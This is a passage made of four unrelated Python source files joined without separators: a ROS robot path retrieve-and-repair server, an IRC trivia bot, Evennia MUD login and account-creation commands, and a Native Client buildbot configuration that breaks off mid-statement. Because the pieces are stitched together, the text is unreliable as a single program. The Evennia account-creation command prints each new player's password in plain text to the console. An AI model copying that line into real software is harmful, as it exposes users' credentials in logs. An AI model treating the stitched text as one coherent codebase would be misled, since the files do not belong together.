                self.draw_points_wrapper.draw_points(invalidDisplay, self.current_group_name, "invalid", DrawPointsWrapper.ANGLES, DrawPointsWrapper.RED, 0.2)

    def _retrieve_repair(self, action_goal):
        """
          Callback which performs the full Retrieve and Repair for the path.
        """
        self.working_lock.acquire()
        self.start_time = time.time()
        self.stats_msg = RRStats()
        self._set_stop_value(False)
        if self.draw_points:
            self.draw_points_wrapper.clear_points()
        rospy.loginfo("RR action server: RR got an action goal")
        s, g = action_goal.start, action_goal.goal
        res = RRResult()
        res.status.status = res.status.FAILURE
        self.current_joint_names = action_goal.joint_names
        self.current_group_name = action_goal.group_name
        projected, retrieved, invalid = [], [], []
        repair_state = STATE_RETRIEVE

        self.stats_msg.init_time = time.time() - self.start_time

        # Go through the retrieve, repair, and return stages of the planning.
        # The while loop should only ever go through 3 iterations, one for each
        #   stage.
        while not self._need_to_stop() and repair_state != STATE_FINISHED:
            if repair_state == STATE_RETRIEVE:
                start_retrieve = time.time()
                projected, retrieved, invalid = self.path_library.retrieve_path(s, g, self.num_paths_checked, self.robot_name, self.current_group_name, self.current_joint_names)
                self.stats_msg.retrieve_time.append(time.time() - start_retrieve)
                if len(projected) == 0:
                    rospy.loginfo("RR action server: got an empty path for retrieve state")
                    repair_state = STATE_FINISHED
                else:
                    start_draw = time.time()
                    if self.draw_points:
                        self.do_retrieved_path_drawing(projected, retrieved, invalid)
                    self.stats_msg.draw_time.append(time.time() - start_draw)
                    repair_state = STATE_REPAIR
            elif repair_state == STATE_REPAIR:
                start_repair = time.time()
                repaired = self._path_repair(projected, action_goal.allowed_planning_time.to_sec(), invalid_sections=invalid)
                self.stats_msg.repair_time.append(time.time() - start_repair)
                if repaired is None:
                    rospy.loginfo("RR action server: path repair didn't finish")
                    repair_state = STATE_FINISHED
                else:
                    repair_state = STATE_RETURN_PATH
            elif repair_state == STATE_RETURN_PATH:
                start_return = time.time()
                res.status.status = res.status.SUCCESS
                res.retrieved_path = [Float64Array(p) for p in retrieved]
                res.repaired_path = [Float64Array(p) for p in repaired]
                rospy.loginfo("RR action server: returning a path")
                repair_state = STATE_FINISHED
                self.stats_msg.return_time = time.time() - start_return
        if repair_state == STATE_RETRIEVE:
            rospy.loginfo("RR action server: stopped before it retrieved a path")
        elif repair_state == STATE_REPAIR:
            rospy.loginfo("RR action server: stopped before it could repair a retrieved path")
        elif repair_state == STATE_RETURN_PATH:
            rospy.loginfo("RR action server: stopped before it could return a repaired path")
        self.rr_server.set_succeeded(res)
        self.stats_msg.total_time = time.time() - self.start_time
        self.stats_pub.publish(self.stats_msg)
        self.working_lock.release()

    def _path_repair(self, original_path, planning_time, invalid_sections=None, use_parallel_repairing=True):
        """
          Goes through each invalid section in a path and calls a planner to
            repair it, with the potential for multi-threading. Returns the
            repaired path.

          Args:
            original_path (path): The original path which needs repairing.
            planning_time (float): The maximum allowed planning time for
              each repair, in seconds.
            invalid_sections (list of pairs of indicies): The pairs of indicies
              describing the invalid sections. If None, then the invalid
              sections will be computed by this function.
            use_parallel_repairing (bool): Whether or not to use multi-threading.

          Returns:
            path: The repaired path.
        """
        zeros_tuple = tuple([0 for i in xrange(len(self.current_joint_names))])
        rospy.loginfo("RR action server: got path with %d points" % len(original_path))

        if invalid_sections is None:
            invalid_sections = self.invalid_section_wrapper.getInvalidSectionsForPath(original_path, self.current_group_name)
        rospy.loginfo("RR action server: invalid sections: %s" % (str(invalid_sections)))
        if len(invalid_sections) > 0:
            if invalid_sections[0][0] == -1:
                rospy.loginfo("RR action server: Start is not a valid state...nothing can be done")
                return None
            if invalid_sections[-1][1] == len(original_path):
                rospy.loginfo("RR action server: Goal is not a valid state...nothing can be done")
                return None

            if use_parallel_repairing:
                #multi-threaded repairing
                self.repaired_sections = [None for i in xrange(len(invalid_sections))]
                #each thread replans an invalid section
                threadList = []
                for i, sec in enumerate(invalid_sections):
                    th = threading.Thread(target=self._repair_thread, args=(i, original_path[sec[0]], original_path[sec[-1]], sec[0], sec[-1], planning_time))
                    threadList.append(th)
                    th.start()
                for th in threadList:
                    th.join()
                #once all threads return, then the repaired sections can be combined
                for item in self.repaired_sections:
                    if item is None:
                        rospy.loginfo("RR action server: RR node was stopped during repair or repair failed")
                        return None
                #replace invalid sections with replanned sections
                new_path = original_path[0:invalid_sections[0][0]]
                for i in xrange(len(invalid_sections)):
                    new_path += self.repaired_sections[i]
                    if i+1 < len(invalid_sections):
                        new_path += original_path[invalid_sections[i][1]+1:invalid_sections[i+1][0]]
                new_path += original_path[invalid_sections[-1][1]+1:]
                self.repaired_sections = [] #reset repaired_sections
            else:
                #single-threaded repairing
                rospy.loginfo("RR action server: Got invalid sections: %s" % str(invalid_sections))
                new_path = original_path[0:invalid_sections[0][0]]
                for i in xrange(len(invalid_sections)):
                    if not self._need_to_stop():
                        #start_invalid and end_invalid must correspond to valid states when passed to the planner
                        start_invalid, end_invalid = invalid_sections[i]
                        rospy.loginfo("RR action server: Requesting path to replace from %d to %d" % (start_invalid, end_invalid))
                        repairedSection = self._call_planner(original_path[start_invalid], original_path[end_invalid])
                        if repairedSection is None:
                            rospy.loginfo("RR action server: RR section repair was stopped or failed")
                            return None
                        rospy.loginfo("RR action server: Planner returned a trajectory of %d points for %d to %d" % (len(repairedSection), start_invalid, end_invalid))
                        new_path += repairedSection
                        if i+1 < len(invalid_sections):
                            new_path += original_path[end_invalid+1:invalid_sections[i+1][0]]
                    else:
                        rospy.loginfo("RR action server: RR was stopped while it was repairing the retrieved path")
                        return None
                new_path += original_path[invalid_sections[-1][1]+1:]
            rospy.loginfo("RR action server: Trajectory after replan has %d points" % len(new_path))
        else:
            new_path = original_path

        rospy.loginfo("RR action server: new trajectory has %i points" % (len(new_path)))
        return new_path

    def _stop_rr_planner(self, msg):
        self._set_stop_value(True)
        rospy.loginfo("RR action server: RR node got a stop message")
        self.stop_rr_planner_publisher.publish(msg)

    def _do_manage_action(self, request):
        """
          Processes a ManagePathLibraryRequest as part of the ManagePathLibrary
            service. Basically, either stores a path in the library or deletes it.
        """
        response = ManagePathLibraryResponse()
        response.result = response.FAILURE
        if request.robot_name == "" or len(request.joint_names) == 0:
            rospy.logerr("RR action server: robot name or joint names were not provided")
            return response

        self.working_lock.acquire()
        if request.action == request.ACTION_STORE:
            rospy.loginfo("RR action server: got a path to store in path library")
            if len(request.path_to_store) > 0:
                new_path = [p.positions for p in request.path_to_store]

                if len(request.retrieved_path) == 0:
                    #PFS won so just store the path
                    store_path_result = self.path_library.store_path(new_path, request.robot_name, request.joint_names)
                else:
                    store_path_result = self.path_library.store_path(new_path, request.robot_name, request.joint_names, [p.positions for p in request.retrieved_path])
                response.result = response.SUCCESS
                response.path_stored, response.num_library_paths = store_path_result
            else:
                response.message = "Path to store had no points"
        elif request.action == request.ACTION_DELETE_PATH:
            rospy.loginfo("RR action server: got a request to delete path %i in the path library" % (request.delete_id))
            if self.path_library.delete_path_by_id(request.delete_id, request.robot_name, request.joint_names):
                response.result = response.SUCCESS
            else:
                response.message = "No path in the library had id %i" % (request.delete_id)
        elif request.action == request.ACTION_DELETE_LIBRARY:
            rospy.loginfo("RR action server: got a request to delete library corresponding to robot %s and joints %s" % (request.robot_name, request.joint_names))
            if self.path_library.delete_library(request.robot_name, request.joint_names):
                response.result = response.SUCCESS
            else:
                response.message = "No library corresponding to robot %s and joint names %s exists"
        else:
            rospy.logerr("RR action server: manage path library request did not have a valid action set")
        self.working_lock.release()
        return response

if __name__ == "__main__":
    try:
        rospy.init_node("rr_node")
        RRNode()
        rospy.loginfo("Retrieve-repair: ready")
        rospy.spin()
    except rospy.ROSInterruptException:
        pass

#!/usr/bin/env python
from django.core.management import setup_environ
import settings
setup_environ(settings)

import socket
from trivia.models import *

irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
irc.connect((settings.IRC_SERVER, settings.IRC_PORT))

def send(msg):
   irc.send(msg + "\r\n")
   print "{SENT} " + msg
   return

def msg(user, msg):
   send("PRIVMSG " + user + " :" + msg)
   return

def processline(line):
   parts = line.split(' :',1)
   args = parts[0].split(' ')
   if (len(parts) > 1):
      args.append(parts[1])
   
   if args[0] == "PING":
      send("PONG :" + args[1])
      return

   try:
      if args[3] == "!questions":
         questions = str(Question.objects.all())
         msg(args[2], questions)
         return

   except IndexError:
      return

   # When we're done, remember to return.
   return
   

send("USER " + (settings.IRC_NICKNAME + " ")*4)
send("NICK " + settings.IRC_NICKNAME)
for channel in settings.IRC_CHANNELS:
   send("JOIN " + channel)

while True:
   # EXIST
   line = irc.recv(1024).rstrip()
   if "\r\n" in line:
      linesep = line.split()
      for l in linesep:
         processline(l)
      continue
   processline(line)





"""
Commands that are available from the connect screen.
"""
import re
import traceback
from django.conf import settings
from src.players.models import PlayerDB
from src.objects.models import ObjectDB
from src.server.models import ServerConfig
from src.comms.models import Channel

from src.utils import create, logger, utils, ansi
from src.commands.default.muxcommand import MuxCommand
from src.commands.cmdhandler import CMD_LOGINSTART

# limit symbol import for API
__all__ = ("CmdUnconnectedConnect", "CmdUnconnectedCreate", "CmdUnconnectedQuit", "CmdUnconnectedLook", "CmdUnconnectedHelp", "Magic")

CONNECTION_SCREEN_MODULE = settings.CONNECTION_SCREEN_MODULE
CONNECTION_SCREEN = ""
try:
    CONNECTION_SCREEN = ansi.parse_ansi(utils.string_from_module(CONNECTION_SCREEN_MODULE))
except Exception:
    pass
if not CONNECTION_SCREEN:
    CONNECTION_SCREEN = "\nEvennia: Error in CONNECTION_SCREEN MODULE (randomly picked connection screen variable is not a string). \nEnter 'help' for aid."

class Magic(MuxCommand):
    """
    Hidden command for the web client's magic cookie authenticator.
    """
    key = "magic"
    def func(self):
        session = self.caller
        player = PlayerDB.objects.player_search(self.lhs)
        if len(player) != 1:
            player = None
        else:
            player = player[0]
            if player.name.lower() != self.lhs.lower():
                player=None
        pswd = None
        if player:
            pswd = self.rhs == player.db.magic_cookie

        if not (player and pswd):
        # No playername or password match
            session.msg("Could not verify Magic Cookie. Please email the server administrator for assistance.")
            return

        # Check IP and/or name bans
        bans = ServerConfig.objects.conf("server_bans") 
        if bans and (any(tup[0]==player.name for tup in bans)
                     or
                     any(tup[2].match(session.address[0]) for tup in bans if tup[2])):
            # this is a banned IP or name!
            string = "{rYou have been banned and cannot continue from here."
            string += "\nIf you feel this ban is in error, please email an admin.{x"
            session.msg(string)
            session.execute_cmd("quit")
            return

        session.sessionhandler.login(session, player)

class Connect(MuxCommand):
    """
    Connect to the game.

    Usage (at login screen):
      connect playername password
      connect "player name" "pass word"

    Use the create command to first create an account before logging in.

    If you have spaces in your name, enclose it in quotes.
    """
    key = "connect"
    aliases = ["conn", "con", "co"]
    locks = "cmd:all()" # not really needed

    def func(self):
        """
        Uses the Django admin api. Note that unlogged-in commands
        have a unique position in that their func() receives
        a session object instead of a source_object like all
        other types of logged-in commands (this is because
        there is no object yet before the player has logged in)
        """

        session = self.caller
        args = self.args
        # extract quoted parts
        parts = [part.strip() for part in re.split(r"\"|\'", args) if part.strip()]
        if len(parts) == 1:
            # this was (hopefully) due to no quotes being found
            parts = parts[0].split(None, 1)
        if len(parts) != 2:
            session.msg("\n\r Usage (without <>): connect <name> <password>")
            return
        playername, password = parts

        # Match account name and check password
        player = PlayerDB.objects.player_search(playername)
        if len(player) != 1:
            player = None
        else:
            player = player[0]
            if player.name.lower() != playername.lower():
                player=None
        pswd = None
        if player:
            pswd = player.check_password(password)

        if not (player and pswd):
        # No playername or password match
            string = "Wrong login information given.\nIf you have spaces in your name or "
            string += "password, don't forget to enclose it in quotes. Also capitalization matters."
            string += "\nIf you are new you should first create a new account "
            string += "using the 'create' command."
            session.msg(string)
            return

        # Check IP and/or name bans
        bans = ServerConfig.objects.conf("server_bans")
        if bans and (any(tup[0]==player.name for tup in bans)
                     or
                     any(tup[2].match(session.address[0]) for tup in bans if tup[2])):
            # this is a banned IP or name!
            string = "{rYou have been banned and cannot continue from here."
            string += "\nIf you feel this ban is in error, please email an admin.{x"
            session.msg(string)
            session.execute_cmd("quit")
            return

        # actually do the login. This will call all other hooks:
        #   session.at_init()
        #   if character:
        #      at_first_login()  # only once
        #      at_pre_login()
        #   player.at_post_login()     - calls look if no character is set
        #   character.at_post_login()  - this calls look command by default
        session.sessionhandler.login(session, player)

class Create(MuxCommand):
    """
    Create a new account.

    Usage (at login screen):
      create <playername> <password>
      create "player name" "pass word"

    This creates a new player account.

    If you have spaces in your name, enclose it in quotes.
    """
    key = "create"
    aliases = ["cre", "cr"]
    locks = "cmd:all()"

    def func(self):
        "Do checks and create account"

        session = self.caller
        args = self.args.strip()

        # extract quoted parts
        parts = [part.strip() for part in re.split(r"\"|\'", args) if part.strip()]
        if len(parts) == 1:
            # this was (hopefully) due to no quotes being found
            parts = parts[0].split(None, 1)
        if len(parts) != 2:
            string = "\n Usage (without <>): create <name> <password>"
            string += "\nIf <name> or <password> contains spaces, enclose it in quotes."
            session.msg(string)
            return
        playername, password = parts
        print "playername '%s', password: '%s'" % (playername, password)

        # sanity checks
        if not re.findall('^[\w. @+-]+$', playername) or not (0 < len(playername) <= 30):
            # this echoes the restrictions made by django's auth module (except not
            # allowing spaces, for convenience of logging in).
            string = "\n\r Playername can max be 30 characters or fewer. Letters, spaces, digits and @/./+/-/_ only."
            session.msg(string)
            return
        # strip excessive spaces in playername
        playername = re.sub(r"\s+", " ", playername).strip()
        if PlayerDB.objects.filter(user__username__iexact=playername) or PlayerDB.objects.filter(username__iexact=playername):
            # player already exists (we also ignore capitalization here)
            session.msg("Sorry, there is already a player with the name '%s'." % playername)
            return
        if not re.findall('^[\w. @+-]+$', password) or not (3 < len(password)):
            string = "\n\r Password should be longer than 3 characers. Letters, spaces, digits and @\.\+\-\_ only."
            string += "\nFor best security, make it longer than 8 characters. You can also use a phrase of"
            string += "\nmany words if you enclose the password in quotes."
            session.msg(string)
            return

        # everything's ok. Create the new player account.
        try:
            default_home = ObjectDB.objects.get_id(settings.CHARACTER_DEFAULT_HOME)

            typeclass = settings.BASE_CHARACTER_TYPECLASS
            permissions = settings.PERMISSION_PLAYER_DEFAULT

            try:
                new_character = create.create_player(playername, None, password,
                                                     permissions=permissions,
                                                     character_typeclass=typeclass,
                                                     character_location=default_home,
                                                     character_home=default_home)
            except Exception:
                session.msg("There was an error creating the default Character/Player:\n%s\n If this problem persists, contact an admin.")
                return
            new_player = new_character.player

            # This needs to be called so the engine knows this player is logging in for the first time.
            # (so it knows to call the right hooks during login later)
            utils.init_new_player(new_player)

            # join the new player to the public channel
            pchanneldef = settings.CHANNEL_PUBLIC
            if pchanneldef:
                pchannel = Channel.objects.get_channel(pchanneldef[0])
                if not pchannel.connect_to(new_player):
                    string = "New player '%s' could not connect to public channel!" % new_player.key
                    logger.log_errmsg(string)

            # allow only the character itself and the player to puppet this character (and Immortals).
            new_character.locks.add("puppet:id(%i) or pid(%i) or perm(Immortals) or pperm(Immortals)" %
                                    (new_character.id, new_player.id))


            # If no description is set, set a default description
            if not new_character.db.desc:
                new_character.db.desc = "This is a Player."

            # tell the caller everything went well.
            string = "A new account '%s' was created. Welcome!"
            if " " in playername:
                string += "\n\nYou can now log in with the command 'connect \"%s\" <your password>'."
            else:
                string += "\n\nYou can now log with the command 'connect %s <your password>'."
            session.msg(string % (playername, playername))

        except Exception:
            # We are in the middle between logged in and -not, so we have to handle tracebacks
            # ourselves at this point. If we don't, we won't see any errors at all.
            string = "%s\nThis is a bug. Please e-mail an admin if the problem persists."
            session.msg(string % (traceback.format_exc()))
            logger.log_errmsg(traceback.format_exc())

class CmdUnconnectedQuit(MuxCommand):
    """
    We maintain a different version of the quit command
    here for unconnected players for the sake of simplicity. The logged in
    version is a bit more complicated.
    """
    key = "quit"
    aliases = ["q", "qu"]
    locks = "cmd:all()"

    def func(self):
        "Simply close the connection."
        session = self.caller
        session.msg("Good bye! Disconnecting ...")
        session.session_disconnect()

class CmdUnconnectedLook(MuxCommand):
    """
    This is an unconnected version of the look command for simplicity.

    This is called by the server and kicks everything in gear.
    All it does is display the connect screen.
    """
    key = CMD_LOGINSTART
    aliases = ["look", "l"]
    locks = "cmd:all()"

    def func(self):
        "Show the connect screen."
        self.caller.msg(CONNECTION_SCREEN)

class CmdUnconnectedHelp(MuxCommand):
    """
    This is an unconnected version of the help command,
    for simplicity. It shows a pane of info.
    """
    key = "help"
    aliases = ["h", "?"]
    locks = "cmd:all()"

    def func(self):
        "Shows help"

        string = \
            """
You are not yet logged into the game. Commands available at this point:
  {wcreate, connect, look, help, quit{n

To login to the system, you need to do one of the following:

{w1){n If you have no previous account, you need to use the 'create'
   command.

     {wcreate Anna c67jHL8p{n

   Note that if you use spaces in your name, you have to enclose in quotes.

     {wcreate "Anna the Barbarian"  c67jHL8p{n

   It's always a good idea (not only here, but everywhere on the net)
   to not use a regular word for your password. Make it longer than
   6 characters or write a passphrase.

{w2){n If you have an account already, either because you just created
   one in {w1){n above or you are returning, use the 'connect' command:

     {wconnect Anna c67jHL8p{n

   (Again, if there are spaces in the name you have to enclose it in quotes).
   This should log you in. Run {whelp{n again once you're logged in
   to get more aid. Hope you enjoy your stay!

You can use the {wlook{n command if you want to see the connect screen again.
"""
        self.caller.msg(string)

#!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

import json
import os
import subprocess
import sys

sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import pynacl.platform

python = sys.executable
bash = '/bin/bash'
echo = 'echo'


BOT_ASSIGNMENT = {
    ######################################################################
    # Buildbots.
    ######################################################################
    'xp-newlib-opt':
        python + ' buildbot\\buildbot_standard.py opt 32 newlib --no-gyp',
    'xp-glibc-opt':
        python + ' buildbot\\buildbot_standard.py opt 32 glibc --no-gyp',

    'xp-bare-newlib-opt':
        python + ' buildbot\\buildbot_standard.py opt 32 newlib --no-gyp',
    'xp-bare-glibc-opt':
        python + ' buildbot\\buildbot_standard.py opt 32 glibc --no-gyp',

    'precise-64-validator-opt':
        python + ' buildbot/buildbot_standard.py opt 64 glibc --validator',

    # Clang.
    'precise_64-newlib-dbg-clang':
        python + ' buildbot/buildbot_standard.py dbg 64 newlib --clang',
    'mac10.7-newlib-dbg-clang':
        python + ' buildbot/buildbot_standard.py dbg 32 newlib --clang',

    # ASan.
    'precise_64-newlib-dbg-asan':
        python + ' buildbot/buildbot_standard.py opt 64 newlib --asan',
    'mac10.7-newlib-dbg-asan':
        python + ' buildbot/buildbot_standard.py opt 32 newlib --asan',

    # PNaCl.
    'oneiric_32-newlib-arm_hw-pnacl-panda-dbg':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-hw-dbg',
    'oneiric_32-newlib-arm_hw-pnacl-panda-opt':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-hw-opt',
    'precise_64-newlib-arm_qemu-pnacl-dbg':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-dbg',
    'precise_64-newlib-arm_qemu-pnacl-opt':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-opt',
    'precise_64-newlib-x86_32-pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 32 pnacl',
    'precise_64-newlib-x86_64-pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 64 pnacl',
    'mac10.8-newlib-opt-pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 32 pnacl',
    'win7-64-newlib-opt-pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 64 pnacl',
    'precise_64-newlib-mips-pnacl':
        echo + ' "TODO(mseaborn): add mips"',
    # PNaCl Spec
    'precise_64-newlib-arm_qemu-pnacl-buildonly-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-arm-buildonly',
    'oneiric_32-newlib-arm_hw-pnacl-panda-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-arm-hw',
    'lucid_64-newlib-x86_32-pnacl-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-x8632',
    'lucid_64-newlib-x86_64-pnacl-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-x8664',
    # NaCl Spec
    'lucid_64-newlib-x86_32-spec':
        bash + ' buildbot/buildbot_spec2k.sh nacl-x8632',
    'lucid_64-newlib-x86_64-spec':
        bash + ' buildbot/buildbot_spec2k.sh nacl-x8664',

    # Valgrind bots.
    'precise-64-newlib-dbg-valgrind':
        echo + ' "Valgrind bots are disabled: see '
            'https://code.google.com/p/nativeclient/issues/detail?id=3158"',
    'precise-64-glibc-dbg-valgrind':
        echo + ' "Valgrind bots are disabled: see '
            'https://code.google.com/p/nativeclient/issues/detail?id=3158"',
    # Coverage.
    'mac10.6-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 64 newlib --coverage'),
    'precise-64-32-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 32 newlib --coverage'),
    'precise-64-64-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 64 newlib --coverage'),
    'xp-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 32 newlib --coverage'),

    ######################################################################
    # Trybots.
    ######################################################################
    'nacl-precise64_validator_opt':
        python + ' buildbot/buildbot_standard.py opt 64 glibc --validator',
    'nacl-precise64_newlib_dbg_valgrind':
        bash + ' buildbot/buildbot_valgrind.sh newlib',
    'nacl-precise64_glibc_dbg_valgrind':
        bash + ' buildbot/buildbot_valgrind.sh glibc',
    # Coverage trybots.
    'nacl-mac10.6-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 64 newlib --coverage'),
    'nacl-precise-64-32-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 32 newlib --coverage'),
    'nacl-precise-64-64-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 64 newlib --coverage'),
    'nacl-win32-newlib-coverage':
         python + (' buildbot/buildbot_standard.py '
                   'coverage 32 newlib --coverage'),
    # Clang trybots.
    'nacl-precise_64-newlib-dbg-clang':
        python + ' buildbot/buildbot_standard.py dbg 64 newlib --clang',
    'nacl-mac10.6-newlib-dbg-clang':
        python + ' buildbot/buildbot_standard.py dbg 32 newlib --clang',
    # Pnacl main trybots
    'nacl-precise_64-newlib-arm_qemu-pnacl':
        bash + ' buildbot/buildbot_pnacl.sh mode-trybot-qemu',
    'nacl-precise_64-newlib-x86_32-pnacl':
         python + ' buildbot/buildbot_pnacl.py opt 32 pnacl',
    'nacl-precise_64-newlib-x86_64-pnacl':
         python + ' buildbot/buildbot_pnacl.py opt 64 pnacl',
    'nacl-precise_64-newlib-mips-pnacl':
        echo + ' "TODO(mseaborn): add mips"',
    'nacl-arm_opt_panda':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-try',
    'nacl-arm_hw_opt_panda':
        bash + ' buildbot/buildbot_pnacl.sh mode-buildbot-arm-hw-try',
    'nacl-mac10.8_newlib_opt_pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 32 pnacl',
    'nacl-win7_64_newlib_opt_pnacl':
        python + ' buildbot/buildbot_pnacl.py opt 64 pnacl',
    # Pnacl spec2k trybots
    'nacl-precise_64-newlib-x86_32-pnacl-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-trybot-x8632',
    'nacl-precise_64-newlib-x86_64-pnacl-spec':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-trybot-x8664',
    'nacl-arm_perf_panda':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-trybot-arm-buildonly',
    'nacl-arm_hw_perf_panda':
        bash + ' buildbot/buildbot_spec2k.sh pnacl-trybot-arm-hw',
    # Toolchain glibc.
    'precise64-glibc': bash + ' buildbot/buildbot_linux-glibc-makefile.sh',
    'mac-glibc': bash + ' buildbot/buildbot_mac-glibc-makefile.sh',
    'win7-glibc': 'buildbot\\buildbot_windows-glibc-makefile.bat',
    # Toolchain newlib x86.
    'win7-toolchain_x86': 'buildbot\\buildbot_toolchain_win.bat',
    'mac-toolchain_x86': bash + ' buildbot/buildbot_toolchain.sh mac',
    'precise64-toolchain_x86': bash + ' buildbot/buildbot_toolchain.sh linux',
    # Toolchain newlib arm.
    'win7-toolchain_arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --buildbot',
    'mac-toolchain_arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --buildbot',
    'precise64-toolchain_arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --buildbot',

    # BIONIC toolchain builders.
    'precise64-toolchain_bionic':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build_bionic'
        ' --buildbot',

    # Pnacl toolchain builders.
    'linux-armtools-x86_32':
        bash + ' buildbot/buildbot_toolchain_arm_trusted.sh',
    'linux-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    'linux-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    'precise-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    'precise-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    'mac-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    # TODO(robertm): Delete this once we are using win-pnacl-x86_64
    'win-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',
    # TODO(robertm): use this in favor or the misnamed win-pnacl-x86_32
    'win-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --buildbot',

    # Pnacl toolchain testers
    'linux-pnacl-x86_64-tests-x86_64':
        bash + ' buildbot/buildbot_pnacl_toolchain_tests.sh tc-test-bot x86-64',
    'linux-pnacl-x86_64-tests-x86_32':
        bash + ' buildbot/buildbot_pnacl_toolchain_tests.sh tc-test-bot x86-32',
    'linux-pnacl-x86_64-tests-arm':
        bash + ' buildbot/buildbot_pnacl_toolchain_tests.sh tc-test-bot arm',

    # MIPS toolchain buildbot.
    'linux-pnacl-x86_32-tests-mips':
        bash + ' buildbot/buildbot_toolchain_mips_trusted.sh',

    # Toolchain trybots.
    'nacl-toolchain-precise64-newlib':
        bash + ' buildbot/buildbot_toolchain.sh linux',
    'nacl-toolchain-mac-newlib': bash + ' buildbot/buildbot_toolchain.sh mac',
    'nacl-toolchain-win7-newlib': 'buildbot\\buildbot_toolchain_win.bat',
    'nacl-toolchain-precise64-newlib-arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --trybot',
    'nacl-toolchain-mac-newlib-arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --trybot',
    'nacl-toolchain-win7-newlib-arm':
        python +
        ' buildbot/buildbot_toolchain_build.py'
        ' toolchain_build'
        ' --trybot',
    'nacl-toolchain-precise64-glibc':
        bash + ' buildbot/buildbot_linux-glibc-makefile.sh',
    'nacl-toolchain-mac-glibc':
        bash + ' buildbot/buildbot_mac-glibc-makefile.sh',
    'nacl-toolchain-win7-glibc':
        'buildbot\\buildbot_windows-glibc-makefile.bat',

    # Pnacl toolchain trybots.
    'nacl-toolchain-linux-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',
    'nacl-toolchain-linux-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',
    'nacl-toolchain-linux-pnacl-mips': echo + ' "TODO(mseaborn)"',
    'nacl-toolchain-precise-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',
    'nacl-toolchain-precise-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',
    'nacl-toolchain-precise-pnacl-mips': echo + ' "TODO(mseaborn)"',
    'nacl-toolchain-mac-pnacl-x86_32':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',
    'nacl-toolchain-win7-pnacl-x86_64':
        python + ' buildbot/buildbot_pnacl_toolchain.py --trybot',

}

special_for_arm = [
    'win7_64',
    'win7-64',
    'lucid-64',
    'lucid64',
    'precise-64',
    'precise64'
]
for platform in [
    'vista', 'win7', 'win8', 'win',
    'mac10.6', 'mac10.7', 'mac10.8',
    'lucid', 'precise'] + special_for_arm:
  if platform in special_for_arm:
    arch_variants = ['arm']
  else:
    arch_variants = ['', '32', '64', 'arm']
  for arch in arch_variants:
    arch_flags = ''
    real_arch = arch
    arch_part = '-' + arch
    # Disable GYP build for win32 bots and arm cross-builders. In this case
    # "win" means Windows XP, not Vista, Windows 7, etc.
    #
    # Building via GYP always builds all toolchains by default, but the win32
    # XP pnacl builds are pathologically slow (e.g. ~38 seconds per compile on
    # the nacl-win32_glibc_opt trybot). There are other builders that test
    # Windows builds via gyp, so the reduced test coverage should be slight.
    if arch == 'arm' or (platform == 'win' and arch == '32'):
      arch_flags += ' --no-gyp'
    if arch == '':
      arch_part = ''
      real_arch = '32'
    # Test with Breakpad tools only on basic Linux builds.
    if sys.platform.startswith('linux'):
      arch_flags += ' --use-breakpad-tools'
    for mode in ['dbg', 'opt']:
      for libc in ['newlib', 'glibc']:
        # Buildbots.
        for bare in ['', '-bare']:
          name = platform + arch_part + bare + '-' + libc + '-' + mode
          assert name not in BOT_ASSIGNMENT, name
          BOT_ASSIGNMENT[name] = (
              python + ' buildbot/buildbot_standard.py ' +
              mode + ' ' + real_arch + ' ' + libc + arch_flags)
        # Trybots
        for arch_sep in ['', '-', '_']:
          name = 'nacl-' + platform + arch_sep + arch + '_' + libc + '_' + mode
          assert name not in BOT_ASSIGNMENT, name
          BOT_ASSIGNMENT[name] = (
